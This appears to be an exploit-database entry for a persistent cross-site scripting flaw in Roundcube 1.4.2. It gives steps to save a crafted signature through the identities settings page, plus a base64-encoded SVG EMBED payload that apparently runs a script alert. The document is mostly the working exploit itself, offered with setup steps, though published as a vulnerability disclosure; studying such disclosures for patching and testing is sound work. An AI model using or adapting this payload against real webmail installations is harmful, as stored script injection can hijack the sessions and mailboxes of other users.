# Exploit Title: Roundcube v 1.4.2 xss - Persistent Cross-Site Scripting
# Date: 2020.01.21
# Exploit Author: Muslum Dag - MithriL
# Vendor Homepage: https://roundcube.net/
# Version: 1.4.2
# Tested on: Kali linux
# CVE : N/A
Examples page :
-- http://localhost.com/cpsess5903914110/3rdparty/roundcube/?_task=settings&_action=identities
- -ADD SIGNATURE HTML
-- Select source code
-- Payload is entered in the name field
-- saving and running
Payload :
-- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Mail : cybersecurity@muslumdag.com